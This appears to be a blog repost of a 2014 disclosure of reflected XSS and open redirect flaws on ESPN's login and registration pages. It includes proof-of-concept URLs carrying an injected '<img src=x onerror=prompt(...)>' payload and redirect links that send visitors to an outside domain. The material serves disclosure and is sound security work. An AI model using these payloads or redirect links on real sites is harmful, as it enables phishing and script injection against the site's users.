Computer Technology Hut

Computer Technology, Security, Vulnerability, Attack …

Day: 2014-12-24

Post navigation

ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities

Posted by BlackWhite

0

binary-code-1024x768

 

ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities

 

Domain:
http://espn.go.com/

 

“ESPN (originally an acronym for Entertainment and Sports Programming Network) is a U.S.-based global cable and satellite television channel that is owned by ESPN Inc., a joint venture between The Walt Disney Company (which operates the network, through its 80% controlling ownership interest) and Hearst Corporation (which holds the remaining 20% interest). The channel focuses on sports-related programming including live and recorded event telecasts, sports news and talk shows, and other original programming.

 

ESPN broadcasts primarily from studio facilities located in Bristol, Connecticut. The network also operates offices in Miami, New York City, Seattle, Charlotte, and Los Angeles. John Skipper currently serves as president of ESPN, a position he has held since January 1, 2012. While ESPN is one of the most successful sports networks, it has been subject to criticism, which includes accusations of biased coverage, conflict of interest, and controversies with individual broadcasters and analysts. ESPN headquarters in Bristol, Connecticut. As of February 2015, ESPN is available to approximately 94,396,000 paid television households (81.1% of households with at least one television set) in the United States. In addition to the flagship channel and its seven related channels in the United States, ESPN broadcasts in more than 200 countries, operating regional channels in Australia, Brazil, Latin America and the United Kingdom, and owning a 20% interest in The Sports Network (TSN) as well as its five sister networks and NHL Network in Canada.”(Wikipedia)

 

 

Vulnerability description:

Espn.go.com has a cyber security bug problem. It is vulnerable to XSS (Cross Site Scripting) and Dest Redirect Privilege Escalation (Open Redirect) attacks.

 

Those vulnerabilities are very dangerous. Since they happen at ESPN’s “login” & “register” pages that are credible. Attackers can abuse those links to mislead ESPN’s users. The success rate of attacks may be high.

 

During the tests, besides the links given above, large number of ESPN’s links are vulnerable to those attacks.

 

The programming code flaw occurs at “espn.go.com”‘s “login?” & “register” pages with “redirect” parameter, i.e.

http://streak.espn.go.com/en/login?redirect=

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com

http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=

https://register.go.com/go/sendMemberNames?regFormId=espn&appRedirect=http://register.go.com/

 

Tests were performed on Firefox (33.0) in Ubuntu (14.04) and IE (8.0. 7601) in Windows 8.

 

Disclosed by:
Wang Jing,
Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (@justqdjing)
http://www.tetraph.com/wangjing/

 

 

 

“The Full Disclosure mailing list is a public forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community. FD differs from other security lists in its open nature and support for researchers’ right to decide how to disclose their own discovered bugs. The full disclosure movement has been credited with forcing vendors to better secure their products and to publicly acknowledge and fix flaws rather than hide them. Vendor legal intimidation and censorship attempts are not tolerated here!” A great many of the fllowing web securities have been published here, Injection, Broken Authentication and Session Management, Cross-Site Scripting (XSS), Insecure Direct Object References, Security Misconfiguration, Sensitive Data Exposure, Missing Function Level Access Control, Cross-Site Request Forgery (CSRF), Using Components with Known Vulnerabilities, Unvalidated Redirects and Forwards. It also publishes suggestions, advisories, solutions details related to XSS and Open Redirect vulnerabilities and cyber intelligence recommendations.

 

 

 

(1) XSS Web Security Vulnerability

XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user’s browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results

  • Identity theft
  • Accessing sensitive or restricted information
  • Gaining free access to otherwise paid for content
  • Spying on user’s web browsing habits
  • Altering browser functionality
  • Public defamation of an individual or corporation
  • Web application defacement
  • Denial of Service attacks

 

 

Vulnerable URLs:

http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459

http://games.espn.go.com/world-cup-bracket-predictor/2014/es/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fworld-cup-bracket-linkedin-predictor%2Fvk%2F2014%2Fes%2Fgame%3Famazon%3Dcreate

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageNamepaypal%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=reddit

https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourYahooAccount/login

 

POC:

http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fstreak.espn.go.com%2Fen%2Fyandex%2FcreateOrUpdateEntrylive%3Fgooglematchup%3Dm32620o35459“><img src=x onerror=prompt(‘justqdjing’)>

https://r.espn.go.com/members/login?appRedirect=http%3A%2F%2Fr.espn.go.com%2Fgame%3Famazon%3Dcreate%2Fmembers%2FmodifyNewsletters%3FpageName%3DESPNNewsletterPage&language=en&affiliateName=espn&regFormId=espn“><img src=x onerror=prompt(‘justqdjing’)>

http://games.espn.go.com/nfl-gridiron-challenge/2014/en/login?redirect=http%3A%2F%2Fgames.espn.go.com%2Fnfl-gridiron-challenge%2Febay2014%2Ffacebookesgame%3Fstep%3Dcreate“><img src=x onerror=prompt(‘justqdjing’)>

https://register.go.com/go/sendMemberNames?aff_code=go&appRedirect=http://register.go.com/disney/ebay/GuestServices/YourAccount/login“><img src=x onerror=prompt(‘justqdjing’)>

 

Poc Video:
https://www.youtube.com/watch?v=gGEZO8wbTBU&feature=youtu.be

Blog Detail:
http://securityrelated.blogspot.sg/2014/12/espn-espngocom-login-register-page-xss.html

 

espn_go_xss

 

 

(2) Dest Redirect Privilege Escalation Vulnerability Web Security Vulnerability

From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker’s choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.

 

Use one of webpages for the following tests. The webpage address is “https://computerpitch.wordpress.com/“. Suppose that this webpage is malicious.

 

The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7.

 

 

(2.1) Login Page Dest Redirect Privilege Escalation Vulnerability

 

Vulnerable URL 1:

https://r.espn.go.com/members/login?appRedirect=https%3A%2F%2Fwww.facebook.com%2FAndroidOfficial

 

POC:
https://r.espn.go.com/members/login?appRedirect=http%3A%2f%2fdiebiyi.com

 

Vulnerable URL 2:

http://streak.espn.go.com/en/login?redirect=https%3A%2F%2Fwww.facebook.com%2Fpages%2Fwwwgooglecom%2Fyahoo101882723190828

 

POC:
http://streak.espn.go.com/en/login?redirect=http%3A%2F%2Fdiebiyi.com

 

 

(2.2) Vulnerabilities Attacked without User Login

Vulnerable URL 1:

http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=https%3A%2F%2Ftwitter.com%2FAdcash%2Flinkedinstatus%2Febay%2Falibaba%2F539770783556698112

 

POC:
http://m.espn.go.com/wireless/mw/util/redirectKeepParams?w=1dpoa&url=http%3A%2F%2Fdiebiyi.com?

This vulnerability was used to demonstrate “Covert Redirect” of Facebook,

Poc Video:
https://www.youtube.com/watch?v=HUE8VbbwUms

 

Blog Detail:
http://www.tetraph.com/blog/covert-redirect/covert-redirect-vulnerability-related-to-oauth-2-0-and-openid/

 

 

Vulnerable URL 2:

http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=https%3A%2F%2Ftwitter.com%2Freddit%2Fbing%2Ftmallstatus%2Ftmall541002332331606017

 

POC:

http://w88.m.espn.go.com/b/ss/wdgwespdeportes/5.4/REDIR/065639236847243821390018102438?D=..&url=http%3A%2F%2Fgoogle.com

 

 

Vulnerable URL 3:

http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=https%3A%2F%2Ftwitter.com%2FYahoo%2Fhao123%2Fstatus%2Fyandex%2F%2Fru%2F541950359917580289

POC:

http://w88.m.espn.go.com/b/ss/wdgespw/5.4/REDIR/088360294087348871389981133993?D=..&url=http%3A%2F%2Fgoogle.com

 

Poc Video:
https://www.youtube.com/watch?v=lCvBt8Elj9w&feature=youtu.be

 

Blog Detail:
http://securityrelated.blogspot.sg/2014/12/espn-espn.html

 

 

(3) Those security problems were reported to ESPN in early 2014. However, they are still unpatched.

 

 

 

 

More Details:
http://seclists.org/fulldisclosure/2014/Dec/36
https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01417.html
http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1303
http://securityrelated.blogspot.com/2014/12/espn-espngocom-login-register
http://diebiyi.com/articles/security/espn-xss-open-redirect/
https://infoswift.wordpress.com/2014/12/30/espn-are-suffering-serious-xss-and-dest
http://webcabinet.tumblr.com/post/118510631147/espn-are-suffering-serious-xss
https://www.facebook.com/permalink.php?story_fbid=435630669942495
http://guyuzui.lofter.com/post/1ccdcda4_6e6b17e
http://mathswift.blogspot.com/2015/05/espn-are-suffering-serious-xss-and-dest.html
http://inzeed.tumblr.com/post/120775132901/espn-xss-open-redirect
http://ittechnology.lofter.com/post/1cfbf60d_730f11d
http://whitehatpost.blog.163.com/blog/static/2422320542015551014553/
https://zuiyuxiang.wordpress.com/2014/12/19/espn-xss-open-redirect/
https://www.facebook.com/permalink.php?story_fbid=1631949187023558

Photo: webcabinet: ESPN Are Suffering Serious XSS and Dest Redirect Privilege Escalation Security… http://t.co/l5fHn27wPO

— tetraph (@tetraphibious) June 5, 2015

https://plus.google.com/u/0/110001022997295385049/posts/TBiJP5A3CXg
http://xingzhehong.lofter.com/post/1cfd0db2_6e68fe3
http://www.tetraph.com/blog/computing-science/espn-xss-open-redirect/

 

Posted in Open Redirect, Privilege Escalation, XSS

Tagged 0-day, Computer Science, cyber-intelligence, Dest Redirect, ESPN, espn.go.com, Hack Prevention, Internet Exploit, IT-news, jing wang, Login-Register, Open Redirect, Privilege Escalation, URF, Vulnerabilities, Web Security, Website Testing, Whitehat Share, XSS

Dec·24

Post navigation

Archives

December 2014
T F S S M T W
« Nov   Jan »
 123
45678910
11121314151617
18192021222324
25262728293031

Topics

0Day Computer Attack Computer Technology Computer Vulnerability Computing Covert Redirect CRLF CSRF CVE CXSecurity Directory Traversal FPD HTML Injection Information Leakage Math Open Redirect OSVDB Phishing Privilege Escalation Research Spam SQL Injection Weak Encryption Web Application Web Attack Website Test Web Technology Web Vulnerability XFS XSS

Info

  • Register
  • Log in
  • Entries feed
  • Comments feed
  • WordPress.com

Recent Posts

  • Daily mail Registration Page Unvalidated Redirects and Forwards Web Security Problem
  • Daily mail Registration Page Unvalidated Redirects and Forwards & XSS Web Security Problem
  • TeleGraph All Photo (Picture) Pages Have Been Vulnerable to XSS Cyber Attacks
  • Daily Mail Online Website XSS Cyber Security Zero-Day Vulnerability
  • VuFind 1.0 Reflected XSS (Cross-site Scripting) Application 0-Day Web Security Bug
  • Winmail Server 4.2 Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug
  • KnowledgeTree OSS 3.0.3b Reflected XSS (Cross-site Scripting) Web Application 0-Day Security Bug
  • PhotoPost PHP 4.8c Cookie Based Stored XSS (Cross-site Scripting) Web Application 0-Day Bug
  • eBay Covert Redirect Web Security Bugs Based on Googleads.g.doubleclick.net
  • Google Covert Redirect Web Security Bugs Based on Googleads.g.doubleclick.net
  • The Weather Channel at Least 76.3% Links Vulnerable to XSS Attacks
  • The New York Times Old Articles Can Be Exploited by XSS Attacks (Almost all Article Pages Before 2013 Are Affected)
  • Mozilla Online Website Two Sub-Domains XSS (Cross-site Scripting) Bugs ( All URLs Under the Two Domains)
  • All Links in Two Topics of Indiatimes (indiatimes.com) Are Vulnerable to XSS (Cross Site Scripting) Attacks
  • CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities
  • OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities
  • OSVDB 119342, 119323 NetCat CMS Multiple HTTP Response Splitting (CRLF) Web Security Vulnerabilities
  • Bugtraq ID 75176 – 6kbbs v8.0 Weak Encryption Cryptography Security Vulnerabilities
  • FC2 Online Web Service Open Redirect (Unvalidated Redirects and Forwards) Cyber Security Vulnerabilities
  • FC2 fc2.com Online Website URLs XSS (cross site scripting) Vulnerabilities (All URLs Under Domain blog.fc2.com/tag)
  • Rakuten Website Search Page XSS (cross site scripting) Web Security Vulnerability
  • Rakuten Online Website Open Redirect (URL Redirection) Cyber Security Vulnerabilities
  • CVE-2014-8753 Cit-e-Net Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities
  • CVE-2014-9468 InstantASP InstantForum.NET Multiple XSS (Cross-Site Scripting) Web Security Vulnerabilities
  • CVE-2015-2563 – Vastal I-tech phpVID 1.2.3 SQL Injection Web Security Vulnerabilities
  • CVE-2015-2349 – SuperWebMailer 5.50.0.01160 XSS (Cross-site Scripting) Web Security Vulnerabilities
  • CVE-2015-2209 – DLGuard Full Path Disclosure (Information Leakage) Web Security Vulnerabilities
  • Amazon Covert Redirect Bug Based on Kindle Daily Post, Omnivoracious, Car Lust
  • CVE-2015-2242 – Webshop hun v1.062S SQL Injection Web Security Vulnerabilities
  • CVE-2015-2214 – NetCat CMS Full Path Disclosure (Information Disclosure) Web Security Vulnerabilities
Blog at WordPress.com.
Cancel
Privacy & Cookies: This site uses cookies. By continuing to use this website, you agree to their use.
To find out more, including how to control cookies, see here: Cookie Policy